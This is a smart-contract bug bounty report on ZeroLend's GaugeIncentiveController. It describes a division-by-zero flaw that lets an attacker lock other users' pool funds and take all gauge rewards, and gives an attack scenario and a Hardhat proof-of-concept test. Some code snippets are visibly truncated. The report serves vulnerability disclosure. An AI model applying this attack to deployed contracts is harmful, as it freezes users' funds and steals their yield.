29052 - [SC - Medium] Pool funds could be locked due to Division by zero

Submitted on Mar 5th 2024 at 22:04:05 UTC by @DuckAstronomer for Boost | ZeroLend

Report ID: #29052

Report type: Smart Contract

Report severity: Medium

Target: https://github.com/zerolend/governance


  • Theft of unclaimed yield

  • Temporary freezing of funds for at least 1 hour


Vulnerability Details

Affected asset: governance-main/contracts/voter/gauge/GaugeIncentiveController.sol

The rewardPerToken() function in GaugeIncentiveController verifies totalSupply for zero, but utilizes derivedSupply for calculation of the rewardPerToken value. If derivedSupply equals zero, rewardPerToken() reverts due to division by zero.


function rewardPerToken(
    IERC20 token
) public view override returns (uint256) {
    if (totalSupply == 0) return rewardPerTokenStored[token];

    // derivedSupply is used instead of totalSupply to modify for ve-BOOST
        rewardPerTokenStored[token] +
        (((lastTimeRewardApplicable(token) - lastUpdateTime[token]) *
            rewardRate[token] *
            PRECISION) / derivedSupply);

The handleAction() function in GaugeIncentiveController serves as a callback for AToken to invoke upon changes in the user's balance (such as minting or burning). Within handleAction(), it initially triggers _updateReward(), which subsequently calls rewardPerToken().

  • https://github.com/zerolend/governance/blob/main/contracts/voter/gauge/GaugeIncentiveController.sol#L87

  • https://github.com/zerolend/governance/blob/main/contracts/voter/gauge/GaugeIncentiveController.sol#L109

  • https://github.com/zerolend/governance/blob/main/contracts/voter/gauge/GaugeIncentiveController.sol#L117

In scenarios where totalSupply is not equal to zero, and if derivedSupply does equal zero, any alterations in AToken (e.g., minting or burning) will result in a revert. This effectively locks the user's funds.

The value of derivedSupply is determined through governance-main/contracts/voter/eligibility/EligibilityCriteria.sol.


function derivedBalance(address account) public view returns (uint256) {
    uint256 _balance = (balanceOf[account] *
        oracle.getAssetPrice(oracleAsset)) / 1e8;

    if (_balance == 0) return 0;

    uint256 multiplierE18 = eligibility.checkEligibility(account, _balance);
    return (_balance * multiplierE18) / 1e18;

For instance, to qualify, a user must mint AToken and stake over 5% of ZeroLend tokens. https://github.com/zerolend/governance/blob/main/contracts/voter/eligibility/EligibilityCriteria.sol#L50

In summary, an attacker could block other users' funds and receive rewards from the gauge by being the first to invoke handleAction() or updateUser().

The attack scenario is the following:

  1. A pool is assigned a new gauge (gauge change occurs). At that point totalSupply and derivedSupply are 0.

  2. The attacker becomes the first AToken minter after gauge change (or just calls updateUser(address who)).

  3. Attacker doesn't stake 5% of ZeroLend, so totalSupply > 0, but derivedSupply == 0.

  4. Subsequent AToken actions within the pool will trigger reverts.

  5. Consequently, the attacker locks users' funds in the pool and earns rewards from the gauge as the sole staker.

Proof of Concept

To run the Poc:

  1. Put the code from below to the governance-main/test/Gauge.poc.2.ts file.

  2. Generate random private key.

  3. Modify governance-main/contracts/voter/eligibility/MockEligibilityCriteria.sol file so the checkEligibility() function returns 0 instead of 1e18.

  4. Issue the following command:

WALLET_PRIVATE_KEY=0x... NODE_ENV=test npx hardhat test test/Gauge.poc.2.ts --config hardhat.config.ts --network hardhat

PoC scenario:

  1. Ant is the first who mints AToken in a pool with new Gauge.

  2. Ant isn't eligible for reward, but it has AToken amount. So, totalSupply > 0, but derivedSupply == 0.

  3. Whale aren't able to mint AToken due to division by zero panic.

import { expect } from "chai";
import { loadFixture } from "@nomicfoundation/hardhat-network-helpers";
import { SignerWithAddress } from "@nomicfoundation/hardhat-ethers/signers";
import {
} from "../typechain-types";
import { e18 } from "./fixtures/utils";
import { deployVoters } from "./fixtures/voters";
import { ethers } from "hardhat";
import { time } from "@nomicfoundation/hardhat-network-helpers";

// Put inside governance-main/test/Gauge.poc.2.ts

// Change governance-main/contracts/voter/eligibility/MockEligibilityCriteria.sol
// to return 0 instead of 1e18 from checkEligibility()

// Run as:
// WALLET_PRIVATE_KEY=0x... NODE_ENV=test npx hardhat test test/Gauge.poc.2.ts --config hardhat.config.ts --network hardhat

describe.only("Immunefi Boost", () => {
  let ant: SignerWithAddress;
  let deployer: SignerWithAddress;
  let now: number;
  let omniStaking: OmnichainStaking;
  let poolVoter: PoolVoter;
  let reserve: TestnetERC20;
  let stakingBonus: StakingBonus;
  let vest: VestedZeroNFT;
  let pool: Pool;
  let aTokenGauge: GaugeIncentiveController;
  let zero: ZeroLend;
  let owner: SignerWithAddress;
  let whale: SignerWithAddress;

  beforeEach(async () => {
    const deployment = await loadFixture(deployVoters);
    ant = deployment.ant;
    now = Math.floor(Date.now() / 1000);
    omniStaking = deployment.governance.omnichainStaking;
    poolVoter = deployment.poolVoter;
    reserve = deployment.lending.erc20;
    stakingBonus = deployment.governance.stakingBonus;
    vest = deployment.governance.vestedZeroNFT;
    zero = deployment.governance.zero;
    pool = deployment.lending.pool;
    aTokenGauge = deployment.aTokenGauge;
    owner = deployment.governance.lending.owner;
    deployer = deployment.governance.deployer;
    whale = deployment.governance.whale;

    // deployer should be able to mint a nft for another user
    await vest.mint(
      e18 * 20n, // 20 ZERO linear vesting
      0, // 0 ZERO upfront
      1000, // linear duration - 1000 seconds
      0, // cliff duration - 0 seconds
      now + 1000, // unlock date
      true, // penalty -> false

    // stake nft on behalf of the ant
    await vest

    // there should now be some voting power for the user to play with
    // ant voting power is ~ 19 ether
    expect(await omniStaking.balanceOf(ant.address)).lessThan(e18 * 20n);

  it("Ant blocks AToken usage and gets all reward in Gauge", async function () {
    let gaugeToken = await aTokenGauge.aToken();
    let atoken = await ethers.getContractAt("AToken", gaugeToken);

    // Mint 1 WETH to ant
    await reserve.connect(owner)["mint(address,uint256)"](ant.address, 1n * e18);
    expect(await reserve.balanceOf(ant.address)).eq(1n * e18);

    // Mint 100 WETH to whale
    await reserve.connect(owner)["mint(address,uint256)"](whale.address, 100n * e18);
    expect(await reserve.balanceOf(whale.address)).eq(100n * e18);
    // Distribute reward, 1000 ZeroLend
    await zero.connect(deployer).approve(aTokenGauge.target, 1000n * e18);
    await aTokenGauge.connect(deployer).notifyRewardAmount(zero.target, 1000n * e18);

    // + 1 Hour
    await time.increase(3600);

    // Mint AToken from WETH for ant
    await reserve.connect(ant).approve(pool.target, 1n * e18);
    await pool.connect(ant).supply(reserve.target, 1n * e18, ant.address, 0n);
    expect(await atoken.balanceOf(ant.address)).greaterThan(0);

    // Mint AToken from WETH for whale ...
    // But it reverts due to division by 0
    // https://github.com/zerolend/governance/blob/main/contracts/voter/gauge/GaugeIncentiveController.sol#L48
    await reserve.connect(whale).approve(pool.target, 100n * e18);
    await expect(
      pool.connect(whale).supply(reserve.target, 100n * e18, whale.address, 0n)
    ).to.be.revertedWithPanic(0x12); // division by zero panic

Last updated

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